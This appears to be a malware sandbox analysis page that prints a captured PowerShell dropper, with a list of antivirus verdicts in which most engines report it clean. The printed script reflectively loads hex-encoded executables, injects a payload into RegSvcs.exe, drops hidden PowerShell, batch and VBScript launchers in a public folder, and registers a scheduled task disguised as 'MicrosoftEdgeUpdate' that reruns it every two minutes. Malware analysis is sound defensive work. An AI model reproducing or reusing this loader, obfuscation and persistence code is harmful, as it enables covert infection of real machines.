popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$Content = @'
$hexString_bbb = "4D/5A/90/00/03/00/00/00/04/00/00/00/FF/FF/00/00/B8/00/00/00/00/00/00/00/40/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/80/00/00/00/0E/1F/BA/0E/00/B4/09/CD/21/B8/01/4C/CD/21/54/68/69/73/20/70/72/6F/67/72/61/6D/20/63/61/6E/6E/6F/74/20/62/65/20/72/75/6E/20/69/6E/20/44/4F/53/20/6D/6F/64/65/2E/0D/0D/0A/24/00/00/00/00/00/00/00/50/45/00/00/4C/01/03/00/23/90/B7/5E/00/00/00/00/00/00/00/00/E0/00/02/01/0B/01/08/00/00/B2/00/00/00/0A/00/00/00/00/00/00/2E/D0/00/00/00/20/00/00/00/E0/00/00/00/00/40/00/00/20/00/00/00/02/00/00/04/00/00/00/00/00/00/00/04/00/00/00/00/00/00/00/00/20/01/00/00/02/00/00/00/00/00/00/02/00/40/85/00/00/10/00/00/10/00/00/00/00/10/00/00/10/00/00/00/00/00/00/10/00/00/00/00/00/00/00/00/00/00/00/D4/CF/00/00/57/00/00/00/00/E0/00/00/FF/07/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/01/00/0C/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/0
$hexString_pe = "4D/5A/90/00/03/00/00/00/04/00/00/00/FF/FF/00/00/B8/00/00/00/00/00/00/00/40/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/80/00/00/00/0E/1F/BA/0E/00/B4/09/CD/21/B8/01/4C/CD/21/54/68/69/73/20/70/72/6F/67/72/61/6D/20/63/61/6E/6E/6F/74/20/62/65/20/72/75/6E/20/69/6E/20/44/4F/53/20/6D/6F/64/65/2E/0D/0D/0A/24/00/00/00/00/00/00/00/50/45/00/00/4C/01/03/00/3F/32/26/90/00/00/00/00/00/00/00/00/E0/00/0E/21/0B/01/30/00/00/1E/01/00/00/06/00/00/00/00/00/00/9E/3C/01/00/00/20/00/00/00/40/01/00/00/00/40/00/00/20/00/00/00/02/00/00/04/00/00/00/00/00/00/00/06/00/00/00/00/00/00/00/00/80/01/00/00/02/00/00/00/00/00/00/03/00/60/85/00/00/10/00/00/10/00/00/00/00/10/00/00/10/00/00/00/00/00/00/10/00/00/00/00/00/00/00/00/00/00/00/50/3C/01/00/4B/00/00/00/00/40/01/00/64/03/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/60/01/00/0C/00/00/00/0A/3C/01/00/1C/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00/00
Sleep 10
[Byte[]] $bbb = $hexString_bbb -split '/' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $hexString_pe -split '/' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
Sleep 5
$a = [Reflection.Assembly]::Load($pe)
$b = $a.GetType('N!!!!!!!!!!!!!!!!!!!!ew!!!!!!!!!!!!!!!PE!2.PE'-replace '!', '')
$c = $b.GetMethod('Execute')
$go = 'C:\Window!!!!!!!!!!!!!!!!!!s\Micr'-replace '!', ''
$L = $go + 'os!!!!oft.NET\F!!!r!!!!!amework!!!!!!!!!!!!\v4.!!!!!!!0.303!!!!!!!!!!19\RegSvcs.exe'-replace '!', ''
$d = @($L, $bbb)
$e = $c.Invoke($null, [object[]] $d)
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.ps1", $Content)
$Content = @'
@e%BTXQJSSA%%BTXQJSSA% off
set "ps=powershell.exe"
set "params=-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"
set "cmd=C:\Users\Public\BTXQJSSA.ps1"
%ps% %params% -Command "& '%cmd%'"
exit /b
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.bat", $Content)
$Content = @'
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
on error resume next
Dim a, b, c, d
a = "C:\Users\Public\BTXQJSSA.bat"
b = "W" + "S" + "c" + "ript"
bs = ".S" + "h" + "ell"
d = ""
Set e = CreateObject(d & b & bs)
e.Run a, c
[IO.File]::WriteAllText("C:\Users\Public\BTXQJSSA.vbs", $Content)
Sleep 2
$scheduler = New-Object -ComObject Schedule.Service
$scheduler.Connect()
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.RegistrationInfo.Description = "Runs a script every 2 minutes"
$taskDefinition.Settings.Enabled = $true
$taskDefinition.Settings.DisallowStartIfOnBatteries = $false
$trigger = $taskDefinition.Triggers.Create(1) # 1 = TimeTrigger
$trigger.StartBoundary = [DateTime]::Now.ToString("yyyy-MM-ddTHH:mm:ss")
$trigger.Repetition.Interval = "PT2M"
Action
$action = $taskDefinition.Actions.Create(0) # 0 = ExecAction
$action.Path = "C:\Users\Public\BTXQJSSA.vbs"
$taskFolder = $scheduler.GetFolder("\")
$taskFolder.RegisterTaskDefinition("MicrosoftEdgeUpdate", $taskDefinition, 6, $null, $null, 3)
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec CL.Downloader!gen211
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Emsisoft Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.VBS.Dropper.fx
CMC Clean
Sophos Clean
Ikarus Clean
GData Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Clean
Panda Clean
No IRMA results available.